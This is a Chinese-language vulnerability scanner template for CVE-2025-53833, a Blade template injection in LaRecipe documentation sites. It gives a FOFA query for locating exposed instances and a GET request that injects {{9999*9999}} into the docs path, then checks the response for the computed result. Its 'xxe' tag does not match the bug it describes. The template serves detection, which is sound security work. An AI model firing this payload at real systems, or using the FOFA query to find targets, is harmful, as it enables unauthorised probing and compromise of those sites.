漏洞描述
fofa: body="LaRecipe" && body="/larecipe/" || body="/docs/1.0/overview#section"
在于 LaRecipe 的文档渲染模块采用了不安全的动态模板编译方式。具体而言,当系统解析 Markdown 文档时,会直接通过 renderBlade()方法处理文档内容,而未对用户可控内容中的 Blade 模板指令(如 {{ }}、{!! !!})进行过滤或转义
id: CVE-2025-53833
info:
name: LaRecipe 模板注入漏洞(CVE-2025-53833)
author: Superhero
severity: high
description: |-
fofa: body="LaRecipe" && body="/larecipe/" || body="/docs/1.0/overview#section"
在于 LaRecipe 的文档渲染模块采用了不安全的动态模板编译方式。具体而言,当系统解析 Markdown 文档时,会直接通过 renderBlade()方法处理文档内容,而未对用户可控内容中的 Blade 模板指令(如 {{ }}、{!! !!})进行过滤或转义
reference:
- https://mp.weixin.qq.com/s/48pDe8DLDJIqFgQztcczSw
tags: cve,cve2025,larecipe,xxe
created: 2025/07/30
rules:
r0:
request:
method: GET
path: /docs/1.0/?{{9999*9999}}
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
expression: response.status == 200 && response.body.bcontains(b'99980001')
expression: r0()